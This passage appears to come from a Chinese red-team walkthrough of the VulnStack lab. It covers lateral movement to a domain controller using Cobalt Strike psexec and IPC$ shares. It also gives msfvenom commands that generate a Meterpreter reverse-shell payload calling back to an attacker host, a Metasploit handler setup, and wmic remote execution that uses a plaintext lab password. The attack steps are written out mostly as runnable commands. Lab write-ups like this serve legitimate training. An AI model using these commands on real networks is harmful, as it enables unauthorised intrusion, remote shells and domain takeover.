【红日安全-VulnStack】ATT&CK实战系列——红队实战(二) (3)

 

【红日安全-VulnStack】ATT&CK实战系列——红队实战(二)

存活主机右键->Login->psexec,选择之前获取到的凭据信息(明文密文均可),选择 Listener 及主机 Session

 

【红日安全-VulnStack】ATT&CK实战系列——红队实战(二)

 

 

 

【红日安全-VulnStack】ATT&CK实战系列——红队实战(二)

 

 

 

【红日安全-VulnStack】ATT&CK实战系列——红队实战(二)

DC成功上线:

【红日安全-VulnStack】ATT&CK实战系列——红队实战(二)

3.5 IPC连接

建立IPC$连接上传木马 建立后可以访问目标机器的文件(上传、下载),也可以在目标机器上运行命令。上传和下载文件直接通过copy命令就可以,不过路径换成UNC路径

常用命令:

net use \\ip\ipc$ pawword /user:username           建立IPC连接

copy hacker.exe \\10.10.10.10\C$\windows\temp      复制本地文件到目标服务器

copy \\10.10.10.10\C$\windows\temp\hash.txt        复制目标服务器文件到本地

3.5.1 使用msf来中转路由

1.meterpreter生成payload.exe

msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.10.80 LPORT=8888 -f exe > /tmp/payload.exe

2.ipc连接

beacon> shell net use \\ip\ipc$ pawword /user:username

beacon> shell copy C:\Users\de1ay.DE1AY\Desktop\payload.exe \\10.10.10.10\c$\windows\temp\payload.exe

 

【红日安全-VulnStack】ATT&CK实战系列——红队实战(二)

 

 

 

【红日安全-VulnStack】ATT&CK实战系列——红队实战(二)

3.meterpreter进行监听

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 10.10.10.80

set lport 8888

4.在跳板机上通过wmic命令执行木马

beacon> shell wmic /node:10.10.10.10 /user:de1ay /password:1qaz@WSX process call create "C:\Windows\Temp\payload.exe"

 

【红日安全-VulnStack】ATT&CK实战系列——红队实战(二)

成功上线:

 

【红日安全-VulnStack】ATT&CK实战系列——红队实战(二)

sessions:

 

【红日安全-VulnStack】ATT&CK实战系列——红队实战(二)

3.5.2 使用cobalt strike来中转路由

作进一步拓展

1.点击Listener 同meterpreter设置 lport ,lhost

 

【红日安全-VulnStack】ATT&CK实战系列——红队实战(二)

 

 

 

【红日安全-VulnStack】ATT&CK实战系列——红队实战(二)

2.生成木马,设置listener为刚才设置的

msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.10.80 LPORT=8888 -f exe > /tmp/payload.exe

3.ipc连接

beacon> shell net use \\ip\ipc$ pawword /user:username

beacon> shell copy C:\Users\de1ay.DE1AY\Desktop\payload.exe \\10.10.10.10\c$\windows\temp\payload.exe

4.在跳板机上通过wmic命令执行木马

beacon> shell wmic /node:10.10.10.10 /user:de1ay /password:1qaz@WSX process call create "C:\Windows\Temp\payload.exe"

5.如果是在dc.de1ay.com双击木马是普通权限,通过cs的中转路由是administrator权限,此时我们拿到域控的管理员权限

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wsfspy.html